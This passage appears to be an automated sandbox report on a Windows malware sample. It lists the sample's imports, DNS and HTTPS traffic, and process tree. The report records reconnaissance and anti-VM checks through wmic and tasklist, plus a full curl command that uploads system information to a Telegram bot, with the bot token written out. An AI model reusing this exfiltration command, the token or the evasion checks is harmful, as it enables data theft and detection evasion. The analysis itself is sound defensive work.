kernel32.dll | EncodePointer, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetStdHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCurrentThreadId, WriteFileEx, SleepEx, GetExitCodeProcess, TerminateProcess, GetSystemTimePreciseAsFileTime, SetWaitableTimer, HeapReAlloc, lstrlenW, ReleaseMutex, FindClose, CreateWaitableTimerExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetCurrentThread, FindFirstFileW, ReadFile, GetOverlappedResult, CancelIo, GetCurrentProcess, SetThreadStackGuarantee, GetConsoleMode, SetFileInformationByHandle, GetModuleHandleW, GetModuleFileNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, GetModuleHandleA, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetEnvironmentStringsW, CompareStringOrdinal, GetCurrentDirectoryW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, DeleteProcThreadAttributeList, FreeEnvironmentStringsW, GetTimeZoneInformationForYear, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FormatMessageW, SetLastError, RtlVirtualUnwind, TlsAlloc, WaitForSingleObject, CreateEventW, TlsGetValue, TlsSetValue, GetLastError, TlsFree, HeapAlloc, FreeLibrary, RtlLookupFunctionEntry, GetProcAddress, HeapFree, GetProcessHeap, GetComputerNameExW, CloseHandle, RtlCaptureContext, QueryPerformanceCounter, DuplicateHandle, Sleep, CreateFileW, LoadLibraryExW
ntdll.dll | RtlNtStatusToDosError, NtReadFile, NtWriteFile
api-ms-win-crt-string-l1-1-0.dll | strcpy_s, wcsncmp
api-ms-win-crt-runtime-l1-1-0.dll | exit, _initterm_e, _initialize_onexit_table, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, __p___argc, _set_app_type, _seh_filter_exe, _crt_atexit, terminate, __p___argv, abort, _cexit, _c_exit, _register_onexit_function, _exit, _register_thread_local_exe_atexit_callback, _initterm
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll | calloc, malloc, free, _set_new_mode
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 22:45:13.956825018 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:13.956885099 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:13.956979036 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:13.976814985 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:13.976846933 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:15.351644039 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:15.351911068 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:15.353914976 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:15.353949070 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:15.354239941 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:15.357839108 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:15.358272076 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:15.358310938 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:16.360083103 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:16.360304117 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Dec 19, 2024 22:45:16.360411882 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:16.381330967 CET | 49775 | 443 | 192.168.2.4 | 149.154.167.220
Dec 19, 2024 22:45:16.381387949 CET | 443 | 49775 | 149.154.167.220 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 22:45:13.816239119 CET | 53344 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 22:45:13.953747034 CET | 53 | 53344 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 22:45:13.816239119 CET | 192.168.2.4 | 1.1.1.1 | 0x4c5c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 22:45:13.953747034 CET | 1.1.1.1 | 192.168.2.4 | 0x4c5c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                          • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49775 | 149.154.167.220 | 443 | 5780 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:45:15 UTC | 251 | OUT | POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
Host: api.telegram.org
User-Agent: curl/7.83.1
Accept: */*
Content-Length: 3664
Content-Type: multipart/form-data; boundary=------------------------cdbe2087272a7b9c
                                          2024-12-19 21:45:15 UTC3664OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 62 65 32 30 38 37 32 37 32 61 37 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 39 33 37 31 30 32 37 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 62 65 32 30 38 37 32 37 32 61 37 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 35 32 38 31 31 30 2d 34 31 37 34 2d 31 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d
Data Ascii:
--------------------------cdbe2087272a7b9c
Content-Disposition: form-data; name="chat_id"

-4193710271
--------------------------cdbe2087272a7b9c
Content-Disposition: form-data; name="document"; filename="528110-4174-1.log"
Content-Type: text/plain
2024-12-19 21:45:16 UTC | 388 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Thu, 19 Dec 2024 21:45:16 GMT
                                          Content-Type: application/json
                                          Content-Length: 466
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-12-19 21:45:16 UTC466INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 36 38 33 39 39 30 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 31 39 33 37 31 30 32 37 31 2c 22 74 69 74 6c 65 22 3a 22 50 72 69 76 61 74 65 20 2d 20 73 74 6f 72 61 67 65 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 34 34
                                          Data Ascii: {"ok":true,"result":{"message_id":3028,"from":{"id":7068399075,"is_bot":true,"first_name":"Virtualbeam","username":"Virtualbeam_bot"},"chat":{"id":-4193710271,"title":"Private - storage","type":"group","all_members_are_administrators":true},"date":1734644



                                          Target ID:0
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\9KEZfGRjyK.exe"
                                          Imagebase:0x7ff7b9010000
                                          File size:378'880 bytes
                                          MD5 hash:73B0E64DCC0DF2F2AC4D461245021E6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" bios get serialnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" baseboard get serialnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" cpu get name
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:16:43:59
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:16:44:00
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" computersystem get totalphysicalmemory
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:16:44:00
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:16:44:01
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" diskdrive get model,size
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:16:44:01
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:11
                                          Start time:16:44:02
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:12
                                          Start time:16:44:02
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:13
                                          Start time:16:44:03
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\getmac.exe
                                          Wow64 process (32bit):false
                                          Commandline:"getmac"
                                          Imagebase:0x7ff7fadd0000
                                          File size:90'112 bytes
                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:14
                                          Start time:16:44:03
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\systeminfo.exe
                                          Wow64 process (32bit):false
                                          Commandline:"systeminfo"
                                          Imagebase:0x7ff796d80000
                                          File size:110'080 bytes
                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m sbiedll.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:16:44:04
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m dbghelp.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:16:44:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m api_log.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:16:44:06
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m dir_watch.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m pstorec.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:16:44:07
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:28
                                          Start time:16:44:08
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m vmcheck.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:16:44:08
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /m wpespy.dll
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:31
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" computersystem get model
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:16:44:09
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vboxservice.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:16:44:10
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\tasklist.exe
                                          Wow64 process (32bit):false
                                          Commandline:"tasklist" /fi "IMAGENAME eq vboxtray.exe"
                                          Imagebase:0x7ff6803b0000
                                          File size:106'496 bytes
                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:39
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:40
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" csproduct get identifyingnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:41
                                          Start time:16:44:11
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:44
                                          Start time:16:44:19
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:45
                                          Start time:16:45:12
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\curl.exe
                                          Wow64 process (32bit):false
                                          Commandline:"curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
                                          Imagebase:0x7ff654820000
                                          File size:530'944 bytes
                                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:46
                                          Start time:16:45:12
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
